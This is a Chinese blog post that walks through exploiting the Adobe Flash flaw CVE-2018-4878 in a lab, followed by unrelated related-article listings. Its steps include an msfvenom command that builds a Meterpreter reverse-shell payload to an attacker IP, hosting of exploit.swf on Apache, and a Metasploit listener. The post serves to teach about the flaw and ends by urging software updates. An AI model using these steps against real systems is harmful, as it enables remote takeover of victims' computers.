CVE-2018-4878 Adobe Flash 0day 漏洞分析与利用

最新推荐文章于 2024-11-05 12:25:28 发布
最新推荐文章于 2024-11-05 12:25:28 发布
阅读量373 收藏 4
点赞数 5
分类专栏: 渗透 文章标签: adobe 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Crow_RDX/article/details/142670899
版权

目录

  1. 漏洞概述
  2. 漏洞影响范围
  3. 漏洞利用
  4. 靶机环境配置
  5. Kali Linux攻击机配置
  6. 生成恶意文件
  7. 启动HTTP服务
  8. 监听会话
  9. 访问恶意链接
  10. 获取Shell
  11. 结论

漏洞概述

Adobe官方于2018年2月1日发布了安全公告(APSA18-01),报告了Adobe Flash Player 28.0.0.137及其之前版本中存在的一个高危漏洞,即CVE-2018-4878。该漏洞允许攻击者通过构造特定的Flash链接,在用户通过浏览器、邮件或Office访问该链接时,实现远程代码执行,进而获取目标系统的shell权限。

漏洞影响范围

  • 操作系统: Windows 7 SP1
  • 浏览器: IE8及以前版本(IE9似乎也可受影响)
  • Adobe Flash版本: 28.0.0.137及其之前的版本

漏洞利用

为了演示如何利用此漏洞,本文将提供一个基本的攻击流程,包括如何生成恶意的Flash文件和HTTP服务的配置。

靶机环境配置

  • 操作系统: Windows 7 SP1
  • 浏览器: IE8或更低版本
  • Flash版本: 28.0.0.137或更低版本

Kali Linux攻击机配置

假设攻击者使用的是Kali Linux系统,攻击机的IP地址为192.168.43.16。

生成恶意文件

  1. 生成Shellcode
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.16 LPORT=4444 -f python > shellcode.txt
  2. 替换Shellcode
    打开并编辑cve-2018-4878.py文件,将原有的Shellcode替换为刚刚生成的Shellcode。

启动HTTP服务

将生成的exploit.swfindex.html文件放置到Kali Linux的Apache2服务的根目录中,并启动服务。

cp index.html /var/www/html/index.html
cp exploit.swf /var/www/html/exploit.swf

监听会话

打开Metasploit框架,设置监听模块和Payload。

use multi/handler
set payload windows/meterpreter/reverse_tcp

访问恶意链接

让目标机器通过存在漏洞的浏览器和Flash版本访问攻击机上的恶意链接:

http://192.168.43.16/index.html

获取Shell

一旦目标机器访问了恶意链接,攻击者即可通过Metasploit框架获得一个Meterpreter会话。

结论

通过本次漏洞分析,我们可以看出,即使是看似普通的网页访问也可能导致系统被攻陷。因此,及时更新软件版本,避免使用老旧的浏览器及插件,是防范此类攻击的有效措施。同时,对于开发者来说,提高代码质量,及时修复已知漏洞同样至关重要。希望本文能够帮助大家加深对网络安全的理解,并提高警惕性。

CrowXXXXX
关注
专栏目录
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-3191利用exp
01-08
标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞,该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI(Java Naming and Directory Interface)注入...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
flash漏洞利用CVE-2018-4878
06-14
flash漏洞利用CVE-2018-4878。 。。。
OpenSSH 用户名枚举漏洞CVE-2018-15473).zip
03-06
OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。 学习笔记
告别复杂协作:Adobe XD的简化替代方案
2301_79599164的博客
11-05 898
Adobe XD是一款集成UI/UX设计和原型创建功能的设计平台。它允许用户进行网页、移动应用的设计,以及原型的绘制,并且能够将静态设计转化为动态的交互原型。尽管Adobe XD提供了这些功能,但它依赖于第三方插件,且插件库有限,同时需要通过计算机上传文件到云端,这使得文件传输变得复杂。幸运的是,国内的UI/UX设计和协作工具有效地解决了这些问题。它是一个基于浏览器的实时协作工具,能够一站式地解决所有协作需求,引领设计协作的新趋势。
QT属性动画--设置样式属性(其他属性)
lizequan的博客
03-02 6323
这里写自定义目录标题故事背景遇到的问题解决过程最终方法感悟 故事背景   最近在制作一个按钮切换的动画特效中接触了属性动画这部分内容,并由此产生了一些思考。 遇到的问题 解决过程 最终方法 感悟 ...
Volatile的其他特性
我想月薪过万的博客
03-03 4629
2.1 volatile总体概览 在上一节中,我们已经研究完了volatile可以实现并发下共享变量的可见性,volatile除了保证可见性外,volatile还具备如下一些突出的特性: volatile的原子性问题:volatile不能保证原子性操作 禁止指令重排序:volatile可以防止指令重排序操作 2.2 volatile不保证原子性 2.3 代码测试 package Ls; /** * 目标:研究Volatile的原子性操作 * <p> * 基本观点:V.
【安卓基础】Android直接通过路径来操作其他应用的私有目录,可以吗?
m0_48179608的博客
03-02 7998
在上篇文章[【安卓基础】一文搞懂Android历代版本文件访问权限变化](https://blog.csdn.net/m0_48179608/article/details/122838494)我们对同一个应用的的文件访问权限做了比较。 那么不同应用之间文件访问又有什么限制呢?我们准备分二到三篇文件来阐述。 这篇文章,主要来看下不同系统版本下,我们直接通过路径来访问其它应用的**内部存储、外部存储私有目录**,看看能不能访问以及不同系统版本的区别。
Silane-PEG-NHS,SIL-PEG-NHS,可以用来修饰蛋白质、多肽以及其他活性基团,NHS-PEG-Silane
qq_39152602的博客
03-03 4210
英文名称:Silane-PEG-NHS 中文名称:硅烷-聚乙二醇-活性酯 分子量:1k,2k,3.4k,5k,10k,20k(可按需定制) 质量控制:95%+ 存储条件:-20°C,避光,避湿 用 途:仅供科研实验使用,不用于诊治 外观: 固体或粘性液体,取决于分子量 注意事项:取用一定要干燥,避免频繁的溶解和冻干 溶解性:溶于大部分有机溶剂,如:DCM、DMF、DMSO、THF等等。在水中有很好的溶解性 取用:现配现用,将包装从冰箱中取出,置于干燥器中缓慢升至室温,打开瓶盖,取用。取用.
[Golang]力扣Leetcode—中级算法—其他—两整数之和(位运算)
皮埃尔的博客
03-03 3450
[Golang]力扣Leetcode—中级算法—其他—两整数之和(位运算)
【通信仿真】基于matlab数字信号增量调制【Matlab仿真 2381期】.zip
11-10
CSDN Matlab武动乾坤上传的资料均有对应的代码,代码均可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博客文章底部QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
ModemManager-glib-devel-1.6.10-3.el7_6.i686.rpm
11-10
Centos7 el7.x86_64 官方离线安装包,安装指令为 sudo rpm -ivh ModemManager-glib-devel-1.6.10-3.el7_6.i686.rpm
基于java的装备展示与销售平台答辩PPT.pptx
最新发布
11-10
基于java的装备展示与销售平台答辩PPT.pptx
IMG_20241110_171336.jpg
11-10
IMG_20241110_171336.jpg
【信息融合】基于matlab平方根容积卡尔曼滤波SRCKF信息融合(无反馈)【含Matlab源码 9096期】.mp4
11-10
Matlab领域上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
基于Java+SpringBoot+Vue的私人诊所管理系统答辩PPT.pptx
11-10
基于Java+SpringBoot+Vue的私人诊所管理系统答辩PPT.pptx
基于Java+SpringBoot+Vue的电影播放平台答辩PPT.pptx
11-10
基于Java+SpringBoot+Vue的电影播放平台答辩PPT.pptx
【心电信号ECG】基于matlab小波变换心音信号去噪(二维时域 频域 三维时域 频域)【Matlab仿真 4629期】.zip
11-10
CSDN Matlab武动乾坤上传的资料均有对应的代码,代码均可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博客文章底部QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值